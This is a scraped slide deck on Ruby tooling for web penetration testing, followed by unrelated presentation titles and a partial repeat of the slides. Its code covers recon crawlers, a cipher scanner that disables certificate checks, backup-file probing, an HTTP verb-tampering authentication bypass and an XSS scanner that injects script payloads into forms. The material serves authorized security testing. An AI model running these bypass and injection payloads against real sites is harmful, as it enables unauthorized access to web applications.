Picks and gems: Ruby for penetration testers
@thesp0nge
self.inspect

https://github.com/thesp0nge
@thesp0nge
http://armoredcode.com
Why Ruby?

• API
  • networking
  • string manipulation
• Net::HTTP
• Coolness
Disclaimer

Attack only sites you are authorized to test.
What to test?

  class Developer
    # a bunch of great
    # methods here
  end

  class Developer
    include Person::Attacker
    # plenty of great
    # methods here
  end

Change your mindset. You're an attacker now!
What to test?

  class Developer
    include Person::Attacker
    # plenty of great
    # methods here
  end

• Your app is a black box
• You must gather information about it
• You don't have credentials
• Ooh look... a web form...

RubyDay IT, Milan, 15 June 2012
Leverage your attack surface

"It's my web application. I don't even promote it. I have all the information about it, what are you talking about?"

• Deep knowledge of the underlying technology
• Spot attack entry points
• Check transport layer security
• Check for the service door
Leverage your attack surface

robots.txt: to discover, to fingerprint
Leverage your attack surface

"Just a bunch of ruby loc away..."

  $ gem install links
  $ links -r http://www.yourtarget.com

  require 'net/http'
  require 'uri'

  # TESTING: SPIDERS, ROBOTS, AND CRAWLERS (OWASP-IG-001)
  # Fetch /robots.txt and return the paths it lists. With only_disallow=true
  # (the default) only Disallow: entries come back: the paths the site owner
  # would rather not have indexed, which is where an attacker looks first.
  def self.robots(site, only_disallow=true)
    if (! site.start_with? 'http://') and (! site.start_with? 'https://')
      site = 'http://'+site
    end
    list = []
    begin
      # No redirect handling: an http:// site that 301s to https:// yields [].
      res=Net::HTTP.get_response(URI(site+'/robots.txt'))
      if (res.code != "200")
        return []
      end
      res.body.split("\n").each do |line|
        # split(":", 2) keeps a "Disallow: http://..." value whole, and .to_s
        # turns a bare "Disallow:" (empty value) into "" instead of raising on
        # nil; strip also drops the "\r" of CRLF files.
        if only_disallow
          if (line.downcase.start_with?('disallow'))
            list << line.split(":", 2)[1].to_s.strip
          end
        else
          if (line.downcase.start_with?('allow') or line.downcase.start_with?('disallow'))
            list << line.split(":", 2)[1].to_s.strip
          end
        end
      end
    rescue
      # A bare rescue reports DNS, TLS and timeout failures as "no robots.txt":
      # acceptable in a quick recon script, not in anything you rely on.
      return []
    end
    list
  end
Demo


• Search engines crawl your site; they are polite, you can ask them not to do it
• Attackers crawl your site... they are not polite.

  $ gem install anemone

  require 'anemone'

  # Crawl the target and print every URL found: the attacker's site map.
  Anemone.crawl("http://www.target.com/") do |anemone|
    anemone.on_every_page do |page|
      puts page.url
    end
  end
Demo


Build a transparent proxy

Sometimes you need to observe the requests your browser makes while using a website... async calls are so sweet...

  $ gem install casper
  $ casper

Useful to check the JavaScript files or URLs being called while manually browsing your target site.
Build a transparent proxy: extending WEBrick

  require 'webrick'
  require 'webrick/httpproxy'   # gem install webrick on Ruby 3.0+, where it left the stdlib

  module Casper
    class Proxy < WEBrick::HTTPProxyServer
      attr_reader :req_count
      attr_reader :hosts

      def initialize(config={})
        @req_count = 0
        @hosts=[]

        # Caveat: WEBrick listens on every interface unless config[:BindAddress]
        # is set; use '127.0.0.1' so only your own browser can reach the proxy.
        config[:Port] ||= 8080
        config[:AccessLog] = []
        # WEBrick calls ProxyContentHandler once per proxied response:
        # this is where the business happens.
        config[:ProxyContentHandler] = Proc.new do |req, res|
          log_requests(req, res)
        end

        super(config)
      end

      private
      def log_requests(req, res)
        $stdout.puts "[#{Time.now}] #{req.request_line.chomp}\n"
        if @hosts.index(req.host).nil?
          @hosts << req.host
        end
        inc_req_count
      end

      def inc_req_count
        @req_count += 1
      end
    end
  end
Demo


enchant: brute force discovery

Very intrusive attack... it discovers web directories using brute force, and every wrong guess is a 404 in the target's logs. You'll be busted.

  $ gem install enchant
  $ enchant http://www.yourtarget.com
Demo


Web application fingerprinting

Web servers answer the same HTTP request in different ways. Even when the Server: banner is stripped or rewritten, the order in which the headers are emitted (Date before Server on Apache, Server first on IIS) still gives the platform away.

  GET / HTTP/1.0

Apache:

  HTTP/1.1 200 OK
  Date: Sun, 15 Jun 2003 17:10:49 GMT
  Server: Apache/1.3.23
  Last-Modified: Thu, 27 Feb 2003 03:48:19 GMT
  ETag: 32417-c4-3e5d8a83
  Accept-Ranges: bytes
  Content-Length: 196
  Connection: close
  Content-Type: text/HTML

IIS:

  HTTP/1.1 200 OK
  Server: Microsoft-IIS/5.0
  Content-Location: http://iis.example.com/Default.htm
  Date: Fri, 01 Jan 1999 20:13:52 GMT
  Content-Type: text/HTML
  Accept-Ranges: bytes
  Last-Modified: Fri, 01 Jan 1999 20:13:52 GMT
  ETag: W/e0d362a4c335be1:ae1
  Content-Length: 133

http://code.google.com/p/webapplicationfingerprinter/
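As an added example (not code from the talk or from webapplicationfingerprinter), here is the header-order trick in Ruby: the two responses shown on the slide are embedded as constructed samples, the signature table is derived only from those two replies and is an assumption rather than a real database, and a third constructed sample shows the case a banner-only check gets wrong: IIS header order behind a rewritten Server: line.

```ruby
require 'socket'

module HeaderOrderFingerprint
  # First headers each server emits, read off the two sample replies on the
  # slide. Assumption: illustrative entries, not a complete signature database.
  SIGNATURES = {
    'Apache'        => %w[date server last-modified],
    'Microsoft-IIS' => %w[server content-location date],
  }.freeze

  # Constructed copies of the slide's two responses (bodies omitted).
  APACHE_SAMPLE = [
    'HTTP/1.1 200 OK',
    'Date: Sun, 15 Jun 2003 17:10:49 GMT',
    'Server: Apache/1.3.23',
    'Last-Modified: Thu, 27 Feb 2003 03:48:19 GMT',
    'ETag: 32417-c4-3e5d8a83',
    'Accept-Ranges: bytes',
    'Content-Length: 196',
    'Connection: close',
    'Content-Type: text/HTML', '', ''
  ].join("\r\n")

  IIS_SAMPLE = [
    'HTTP/1.1 200 OK',
    'Server: Microsoft-IIS/5.0',
    'Content-Location: http://iis.example.com/Default.htm',
    'Date: Fri, 01 Jan 1999 20:13:52 GMT',
    'Content-Type: text/HTML',
    'Accept-Ranges: bytes',
    'Last-Modified: Fri, 01 Jan 1999 20:13:52 GMT',
    'ETag: W/e0d362a4c335be1:ae1',
    'Content-Length: 133', '', ''
  ].join("\r\n")

  # Constructed: IIS header order with a rewritten banner.
  SPOOFED_SAMPLE = IIS_SAMPLE.sub('Server: Microsoft-IIS/5.0', 'Server: Apache/2.4.57')

  # Ordered, lower-cased header names of a raw response, status line dropped.
  def self.header_names(raw)
    head = raw.split(/\r?\n\r?\n/, 2).first.to_s
    lines = head.split(/\r?\n/)
    lines.shift if lines.first.to_s.start_with?('HTTP/')
    lines.map { |l| l.split(':', 2).first.strip.downcase }
  end

  # The Server: banner, or nil when the server does not send one.
  def self.banner(raw)
    raw[/^Server:[ \t]*(.+?)[ \t]*\r?$/i, 1]
  end

  # Guess from header order alone; nil when no signature matches.
  def self.order_guess(raw)
    names = header_names(raw)
    hit = SIGNATURES.find { |_, sig| names.first(sig.size) == sig }
    hit && hit.first
  end

  # Banner, order-based guess, and whether they agree. A disagreement is the
  # interesting outcome: someone edited the banner but not the server.
  def self.fingerprint(raw)
    b = banner(raw)
    g = order_guess(raw)
    { banner: b, order_guess: g, consistent: b.nil? || g.nil? || b.start_with?(g) }
  end

  # Live probe with the exact request from the slide, over a plain socket so
  # the headers are seen in the order the server sent them. Authorized hosts only.
  def self.probe(host, port = 80, path = '/')
    TCPSocket.open(host, port) do |s|
      s.write("GET #{path} HTTP/1.0\r\nHost: #{host}\r\n\r\n")
      fingerprint(s.read)
    end
  end
end
```

A plain socket is used instead of Net::HTTP on purpose: the wire order of the headers is the signal, and a client library that normalises headers into a hash may not preserve it.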
SSL Testing

Evaluate an SSL connection for:
• protocols the server supports
• cipher length
• certificate key length

  $ gem install ciphersurfer
  $ ciphersurfer www.gmail.com
  Evaluating secure communication with www.gmail.com:443
    Overall evaluation : B (76.5)
      Protocol support : ooooooooooooooooooooooooooooooooooooooooooooooooooooooo (55)
          Key exchange : oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo (80)
       Cipher strength : oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo (90)

(output as of June 2012)
SSL Testing

  # From the ciphersurfer CLI: protocol_version, host, port and the three
  # accumulators are defined earlier in that script. One scan per protocol
  # version; whatever the server accepts is merged into the totals.
  protocol_version.each do |version|
    s = Ciphersurfer::Scanner.new({:host=>host, :port=>port, :proto=>version})
    s.go
    if (s.ok_ciphers.size != 0)
      supported_protocols << version
      cipher_bits = cipher_bits | s.ok_bits
      ciphers = ciphers | s.ok_ciphers
    end
  end

  # Ciphersurfer::Scanner#go: one TLS handshake per cipher the local OpenSSL
  # offers for this protocol version; the handshakes that complete are recorded.
  # Note that the scan can only see ciphers your OpenSSL build knows about.
  def go
    context=OpenSSL::SSL::SSLContext.new(@proto)
    cipher_set = context.ciphers
    cipher_set.each do |cipher_name, cipher_version, bits, algorithm_bits|
      request = Net::HTTP.new(@host, @port)
      request.use_ssl = true
      # VERIFY_NONE is acceptable here only because the goal is to learn which
      # ciphers the server accepts, not to trust it; never copy this into client code.
      request.verify_mode = OpenSSL::SSL::VERIFY_NONE
      request.ciphers = cipher_name
      begin
        response = request.get("/")
        @ok_bits << bits
        @ok_ciphers << cipher_name
      rescue OpenSSL::SSL::SSLError => e
        # Quietly discard SSLErrors, really I don't care if the cipher has
        # not been accepted
      rescue
        # Quietly discard all other errors... you must perform all error
        # checks in the calling program
      end
    end
  end
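The report on the previous slide turns three per-category scores into one mark. As an added example (not ciphersurfer's own code), the block below shows one way to compute that: the weights (30% protocol support, 30% key exchange, 40% cipher strength) and the per-category tables follow the SSL Labs Server Rating Guide, whose layout the ciphersurfer report mirrors; that ciphersurfer uses exactly these tables is an assumption. The weighting reproduces the 76.5 on the slide from the three sub-scores shown there; the other inputs are constructed.

```ruby
# Added example: grade a TLS endpoint from what a cipher scan found.
# Tables and weights follow the SSL Labs Server Rating Guide (assumption:
# ciphersurfer's own tables may differ). Protocol names are the symbols
# OpenSSL::SSL::SSLContext.new accepts, as used by the scanner above.
module TlsGrade
  PROTOCOL_SCORE = { SSLv2: 0, SSLv3: 80, TLSv1: 90, TLSv1_1: 95, TLSv1_2: 100 }.freeze

  # Protocol support: average of the best and the worst protocol offered, so a
  # TLS 1.2 server that still speaks SSLv2 scores 50, not 100.
  def self.protocol_score(protocols)
    s = protocols.map { |p| PROTOCOL_SCORE.fetch(p) }
    (s.max + s.min) / 2.0
  end

  # Key exchange: judged on the server key length; 0 bits means anonymous DH.
  def self.key_exchange_score(key_bits)
    case key_bits
    when 0            then 0
    when 1...512      then 20
    when 512...1024   then 40
    when 1024...2048  then 80
    when 2048...4096  then 90
    else 100
    end
  end

  # Cipher strength: average of the strongest and the weakest accepted cipher,
  # so one 40-bit export cipher halves the score of a 256-bit server.
  def self.cipher_score(bits_list)
    scores = bits_list.map { |b| b == 0 ? 0 : b < 128 ? 20 : b < 256 ? 80 : 100 }
    (scores.max + scores.min) / 2.0
  end

  def self.overall(protocol, key_exchange, cipher)
    (0.3 * protocol + 0.3 * key_exchange + 0.4 * cipher).round(1)
  end

  def self.letter(score)
    case score
    when 80..100 then 'A'
    when 65...80 then 'B'
    when 50...65 then 'C'
    when 35...50 then 'D'
    when 20...35 then 'E'
    else 'F'
    end
  end

  # protocols: accepted protocol symbols; key_bits: server key length;
  # cipher_bits: bit lengths of every accepted cipher (the scanner's ok_bits).
  def self.report(protocols, key_bits, cipher_bits)
    p = protocol_score(protocols)
    k = key_exchange_score(key_bits)
    c = cipher_score(cipher_bits)
    o = overall(p, k, c)
    { protocol: p, key_exchange: k, cipher: c, overall: o, grade: letter(o) }
  end
end
```

The averaging of best and worst is the point to take away: the grade is pulled down by the weakest thing the server still accepts, not lifted by the strongest thing it supports.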
Demo


Check for backup files

Crawl the web site and append file extensions to your GETs.

  require 'anemone'
  require 'httpclient'

  h=HTTPClient.new()
  Anemone.crawl(ARGV[0]) do |anemone|
    anemone.on_every_page do |page|
      response = h.get(page.url)
      puts "Original: #{page.url}: #{response.code}"
      # Drop ";jsessionid=..." style path parameters before appending a suffix.
      base = page.url.to_s.split(";")[0]
      # A 200 on the .bak URL proves nothing on a site that answers 200 for
      # every path: compare the body with the original's before believing it.
      { "BAK" => ".bak", "OLD" => ".old", "~" => "~" }.each do |label, suffix|
        response = h.get(base + suffix)
        puts "#{label}: #{base + suffix}: #{response.code}"
      end
    end
  end
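The script above prints a status code per guess and leaves the judgement to you. As an added example (not from the talk), the block below does the two things a practitioner wants on top of it: it builds the candidate URLs correctly for URLs carrying path parameters, query strings or a trailing slash, and it tells a real backup apart from a "soft 404" site that returns 200 with the same error page for every path. The transport is injected through a hypothetical callable returning [status, body], so the logic runs offline against the two constructed servers at the end; wrap HTTPClient or Net::HTTP in the same shape for real use.

```ruby
require 'uri'
require 'securerandom'

module BackupCheck
  SUFFIXES = %w[.bak .old ~].freeze   # the three the slide tries

  # Strip ";jsessionid=..." path parameters and the query string, then append
  # each suffix to the file name. A URL ending in "/" names a directory and
  # "dir/.bak" is not a backup of anything, so it yields no candidates.
  def self.candidates(url)
    uri = URI(url)
    path = uri.path.split(';', 2).first.to_s
    return [] if path.empty? || path.end_with?('/')
    SUFFIXES.map do |suffix|
      u = uri.dup
      u.path = path + suffix
      u.query = nil
      u.to_s
    end
  end

  # A hit counts only if it is a 200 whose body differs from what the server
  # returns for a path that certainly does not exist.
  def self.interesting?(baseline, hit)
    hit_status, hit_body = hit
    base_status, base_body = baseline
    return false unless hit_status == 200
    return true unless base_status == 200        # server does proper 404s
    hit_body.to_s.strip != base_body.to_s.strip  # soft 404: same error page?
  end

  # fetch: callable taking a URL and returning [status, body] (hypothetical
  # interface). The baseline is a random, surely-missing sibling of the file.
  def self.scan(url, fetch)
    uri = URI(url)
    probe = uri.dup
    probe.path = uri.path.split(';', 2).first.to_s + '.' + SecureRandom.hex(8)
    probe.query = nil
    baseline = fetch.call(probe.to_s)
    candidates(url).select { |c| interesting?(baseline, fetch.call(c)) }
  end

  # Constructed stand-ins for two kinds of servers, used in place of a network.
  # One answers 200 for everything (only login.php.bak is real); the other
  # returns honest 404s and has an editor backup, login.php~, lying around.
  SOFT_404_SERVER = lambda do |u|
    u.end_with?('/app/login.php.bak') ? [200, "<?php $db_pass = 'hunter2';"] : [200, '<h1>Page not found</h1>']
  end
  STRICT_SERVER = lambda do |u|
    u.end_with?('/app/login.php~') ? [200, '<?php // editor backup'] : [404, '']
  end
end
```

Use BackupCheck.scan(page.url.to_s, fetch) inside the anemone callback; the baseline request costs one extra GET per page and removes the false positives that make naive suffix scans useless on catch-all sites.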
Demo


Bypass

A case study for a PHP 5.3 application using basic auth: with a tampered HTTP verb you can access protected URLs. The check only fires for the verbs the server configuration lists (GET, POST); a verb it has never heard of falls through to the default handler and is served with no credentials.

Create a custom HTTP verb:

  require 'net/http'

  # Net::HTTPRequest reads the verb and the body flags from class constants,
  # so a new verb is just a new subclass.
  class Dammi < Net::HTTPRequest
    METHOD="DAMMI"
    REQUEST_HAS_BODY = false
    RESPONSE_HAS_BODY = true
  end

Make the request:

  http=Net::HTTP.new('www.mytarget.nonexistent', 80)
  r_a = http.request(Dammi.new("/backend/index.php"))
  puts r_a.body
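One request with one made-up verb is a proof of concept; a test wants the protected path tried with several verbs and GET used as the reference. As an added example (not code from the talk), the block below builds a request class per verb at runtime the way the Dammi class does, collects status and body per verb, and flags a bypass only when GET is refused while another verb is served something other than the same error page. The verb list is an assumption, and the backend at the end is a constructed stand-in for the vulnerable application, so the logic runs offline; pass a real Net::HTTP for an authorized target.

```ruby
require 'net/http'

module VerbTamper
  # One request class per verb, built at runtime: Net::HTTPRequest takes the
  # verb and the body flags from class constants, exactly like Dammi above.
  def self.request_class(verb)
    Class.new(Net::HTTPRequest) do
      const_set(:METHOD, verb.to_s.upcase)
      const_set(:REQUEST_HAS_BODY, false)
      const_set(:RESPONSE_HAS_BODY, true)
    end
  end

  # Assumption: sample verb list. GET is the reference, the rest are probes.
  VERBS = %w[GET POST HEAD OPTIONS DAMMI].freeze

  # http: anything with request(req) returning an object that responds to
  # code and body (a real Net::HTTP, or the FakeBackend below).
  # Returns { verb => [status, body] }.
  def self.probe(http, path, verbs = VERBS)
    verbs.each_with_object({}) do |verb, out|
      res = http.request(request_class(verb).new(path))
      out[verb] = [res.code.to_i, res.body.to_s]
    end
  end

  # Bypass suspected when GET is refused (401/403) but another verb gets a 200
  # whose body is not just the same error page GET received.
  def self.bypass_verbs(results)
    get_status, get_body = results.fetch('GET')
    return [] unless [401, 403].include?(get_status)
    results.select { |verb, (status, body)|
      verb != 'GET' && status == 200 && body != get_body
    }.keys
  end

  # Constructed stand-in for the vulnerable backend: authentication is
  # enforced for the verbs the configuration lists (GET, POST) and nothing else.
  FakeResponse = Struct.new(:code, :body)
  class FakeBackend
    def request(req)
      if %w[GET POST].include?(req.method)
        FakeResponse.new('401', '<h1>Authorization Required</h1>')
      else
        FakeResponse.new('200', '<html><body>backend index: admin tools</body></html>')
      end
    end
  end
end
```

The body comparison matters: a server that answers 200 with a generic "method not supported" page for every unknown verb would otherwise look like a bypass. Against a real target also compare the tampered-verb body with what an authenticated GET returns.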
Cross site scripting

Executing arbitrary JavaScript code at the client side by submitting a crafted parameter on a web form.
Cross site scripting

  $ gem install cross
  $ cross http://www.yourtarget.com

  require 'mechanize'
  require 'logger'
  require 'singleton'

  module Cross
    # Engine is the cross class using Mechanize to inject canary and check for
    # output
    class Engine
      include Singleton
      attr_reader :agent
      # Starts the engine
      def start
        @agent = Mechanize.new {|a| a.log = Logger.new("cross.log")}
        @agent.user_agent_alias = 'Mac Safari'
      end
      # Fill every field of every form with the canary, submit, and look for a
      # <script> element whose body is exactly the canary's: a reflection the
      # browser would have executed. A canary that comes back HTML-encoded is
      # not matched, which is right: encoded output is the fix, not the bug.
      def inject(url)
        found = false
        page = @agent.get(url)
        page.forms.each do |f|
          f.fields.each do |ff|
             ff.value = "<script>alert('cross canary');</script>"
          end
          pp = @agent.submit(f)
          scripts = pp.search("//script")
          scripts.each do |sc|
             if sc.children.text == "alert('cross canary');"
               found = true
             end
          end
        end
        found
      end
    end
  end
Cross site scripting

  #!/usr/bin/env ruby

  $LOAD_PATH.unshift(File.expand_path(File.dirname(__FILE__) + '/../lib'))

  require 'mechanize'
  require 'ap'
  require 'logger'
  require 'cross'

  host = Cross::Host.new(ARGV[0])
  ap "cross " + Cross::Version.version[:string] + " (C) 2011 - thesp0nge"
  ap "target: " + host.host

  engine = Cross::Engine.instance
  engine.start

  if engine.inject(ARGV[0])
    ap "Canary found in output page. Suspected XSS"
  end

It doesn't work with iframe apps :-(
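The cross engine uses a fixed canary and a yes/no answer. As an added example (not from the cross gem), the block below makes two refinements a practitioner wants: a canary that is unique per run, so a page that already carries alert() calls of its own cannot produce a match, and a three-way result that separates an executable reflection from an inert one (the token came back HTML-encoded or with its tags stripped, which is the application doing the right thing) and from no reflection at all. It needs no Mechanize: the pages are constructed here, once echoing the parameter raw and once through CGI.escapeHTML, and classify can replace the string comparison inside Engine#inject on the HTML Mechanize fetched.

```ruby
require 'securerandom'
require 'cgi'

module CanaryCheck
  # A fresh token per run. Returns [token, payload]; the token is what you
  # search for, the payload is what goes into the form field.
  def self.new_canary
    token = "xss#{SecureRandom.hex(6)}"
    [token, "<script>alert('#{token}');</script>"]
  end

  # :executable  the canary is the body of a <script> element, i.e. the browser
  #              would have run it (the same condition cross checks for)
  # :inert       the token is in the page but only encoded or stripped of its
  #              tags: the application handled the input correctly
  # :absent      the parameter is not reflected on this page at all
  def self.classify(html, token)
    scripts = html.scan(%r{<script\b[^>]*>(.*?)</script>}mi).flatten
    return :executable if scripts.any? { |s| s.strip == "alert('#{token}');" }
    return :inert if html.include?(token)
    :absent
  end

  # Constructed pages: the same search-result template, once echoing the
  # parameter raw and once through CGI.escapeHTML (the fix). Both carry a
  # <script> of their own, which a fixed canary check could trip over.
  def self.vulnerable_page(q)
    "<html><body><script>var site='shop';</script>Results for #{q}</body></html>"
  end

  def self.hardened_page(q)
    "<html><body><script>var site='shop';</script>Results for #{CGI.escapeHTML(q)}</body></html>"
  end
end
```

This still only covers reflection into a script element, the case the talk's tool targets; a parameter echoed into an attribute value or an event handler needs a different payload (one that closes the attribute first) and a different check.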
Demo


What we learnt

• Don't trust your users
• "Security through obscurity" is EVIL
• Testing for security issues is a mandatory step before deploy
• HTTPS won't save you from XSS or SQL injection
Some links

http://armoredcode.com/blog/categories/pentest-with-ruby/
https://gist.github.com/2935464 (gist for the anemone crawling demo)
https://github.com/thesp0nge/links
https://github.com/thesp0nge/ciphersurfer
https://github.com/thesp0nge/enchant
https://github.com/thesp0nge/cross
http://www.owasp.org
http://ronin-ruby.github.com/
https://github.com/rapid7/metasploit-framework
Questions?

Thank you!

DMCC Future of Trade Web3 - Special Edition
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 

Picking gem ruby for penetration testers

  • 1. picks and gems: ruby for penetration @thesp0nge
  • 3. Why ruby?
    • API
      • networking
      • string manipulation
    • Net::HTTP
    • Coolness

  • 4. Disclaimer
    Attack only sites you’re authorized to

  • 5. What to test?

    class Developer
      # a bunch of great
      # methods here
    end

    class Developer
      include Person::Attacker
      # a plenty of great
      # methods here
    end

    Change your mindset. You’re an attacker now!

  • 6. What to test?

    class Developer
      include Person::Attacker
      # a plenty of great
      # methods here
    end

    Your app is a black box. You must gather information about it. You don’t have credentials. Ooh look... a web form...

    RubyDay IT, Milan, 15 June 2012

  • 7. Leverage your attack surface
    “It’s my web application. I don’t even promote it. I have all the information about it, what are you talking about?”
    • Deep knowledge of the underlying technology
    • Spot attack entrypoints
    • Check transport layer security
    • Check for the service door

  • 8. Leverage your attack surface
    robots.txt: to discover, to fingerprint
  • 9. Leverage your attack surface

    $ gem install links
    $ links -r http://www.yourtarget.com

    “Just a bunch of ruby loc away...”

    require 'net/http'
    require 'uri'

    # TESTING: SPIDERS, ROBOTS, AND CRAWLERS (OWASP-IG-001)
    def self.robots(site, only_disallow=true)
      if (! site.start_with? 'http://') and (! site.start_with? 'https://')
        site = 'http://'+site
      end
      list = []
      begin
        res=Net::HTTP.get_response(URI(site+'/robots.txt'))
        if (res.code != "200")
          return []
        end
        res.body.split("\n").each do |line|
          # split on the first ':' only and skip directives with an empty value:
          # a bare "Disallow:" line would otherwise raise and empty the whole list
          value = line.split(":", 2)[1]
          next if value.nil? || value.strip.empty?
          if only_disallow
            if (line.downcase.start_with?('disallow'))
              list << value.strip
            end
          else
            if (line.downcase.start_with?('allow') or line.downcase.start_with?('disallow'))
              list << value.strip
            end
          end
        end
      rescue
        return []
      end
      list
    end
  • 11. Crawling a website
    • Search engines crawl your site: they are polite, you can ask them not to do it
    • Attackers crawl your site... they are not polite.

    $ gem install anemone

    require 'anemone'
    Anemone.crawl("http://www.target.com/") do |anemone|
      anemone.on_every_page do |page|
        puts page.url
      end
    end

  • 13. Build a transparent proxy
    Sometimes you need to observe the requests your browser makes while using a website... async calls are so sweet...

    $ gem install casper
    $ casper
    on going...

    Useful to check the JavaScript files or URLs called while manually browsing your target site.
  • 14. Build a transparent proxy

    require 'webrick'
    require 'webrick/httpproxy'

    module Casper
      # Extending WEBrick
      class Proxy < WEBrick::HTTPProxyServer
        attr_reader :req_count
        attr_reader :hosts

        def initialize(config={})
          @req_count = 0
          @hosts=[]
          config[:Port] ||= 8080
          config[:AccessLog] = []
          # called for every proxied request/response pair
          config[:ProxyContentHandler] = Proc.new do |req, res|
            log_requests(req, res)
          end
          super(config)
        end

        private

        # Make the business
        def log_requests(req, res)
          $stdout.puts "[#{Time.now}] #{req.request_line.chomp}\n"
          if @hosts.index(req.host).nil?
            @hosts << req.host
          end
          inc_req_count
        end

        def inc_req_count
          @req_count += 1
        end
      end
    end
  • 16. enchant: brute force discovery
    Very intrusive attack... discover web directories using brute force. You’ll be busted.

    $ gem install enchant
    $ enchant http://www.yourtarget.com
  • 18. Web Application fingerprinting
    Web servers answer the same HTTP request in different ways.

    GET / HTTP/1.0

    Apache:

    HTTP/1.1 200 OK
    Date: Sun, 15 Jun 2003 17:10:49 GMT
    Server: Apache/1.3.23
    Last-Modified: Thu, 27 Feb 2003 03:48:19 GMT
    ETag: 32417-c4-3e5d8a83
    Accept-Ranges: bytes
    Content-Length: 196
    Connection: close
    Content-Type: text/HTML

    Microsoft IIS:

    HTTP/1.1 200 OK
    Server: Microsoft-IIS/5.0
    Content-Location: http://iis.example.com/Default.htm
    Date: Fri, 01 Jan 1999 20:13:52 GMT
    Content-Type: text/HTML
    Accept-Ranges: bytes
    Last-Modified: Fri, 01 Jan 1999 20:13:52 GMT
    ETag: W/e0d362a4c335be1:ae1
    Content-Length: 133

    http://code.google.com/p/webapplicationfingerprinter/
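An added example, not code from the deck or from thesp0nge's tools: a small parser for the two responses above (embedded as sample input) that reports the Server banner and the header order, the two things these responses give away; the last function is the defender's check, flagging a banner that still carries a product version.

```ruby
# Added example (not from the deck): the two responses from the slide,
# embedded here as constructed sample input.
APACHE_RESPONSE = <<~HTTP
  HTTP/1.1 200 OK
  Date: Sun, 15 Jun 2003 17:10:49 GMT
  Server: Apache/1.3.23
  Last-Modified: Thu, 27 Feb 2003 03:48:19 GMT
  ETag: 32417-c4-3e5d8a83
  Accept-Ranges: bytes
  Content-Length: 196
  Connection: close
  Content-Type: text/HTML
HTTP

IIS_RESPONSE = <<~HTTP
  HTTP/1.1 200 OK
  Server: Microsoft-IIS/5.0
  Content-Location: http://iis.example.com/Default.htm
  Date: Fri, 01 Jan 1999 20:13:52 GMT
  Content-Type: text/HTML
  Accept-Ranges: bytes
  Last-Modified: Fri, 01 Jan 1999 20:13:52 GMT
  ETag: W/e0d362a4c335be1:ae1
  Content-Length: 133
HTTP

# Split a raw response into its status line and an ordered list of
# [name, value] header pairs. Each line is split once only: values such
# as the ETag or Content-Location above contain ':' themselves.
def parse_response(raw)
  status, *header_lines = raw.lines.map(&:chomp).reject(&:empty?)
  headers = header_lines.map do |line|
    name, value = line.split(":", 2)
    [name.strip, value.to_s.strip]
  end
  { status: status, headers: headers }
end

# What a response gives away: the Server banner (product and version) and
# the order in which headers are emitted, which differs per implementation
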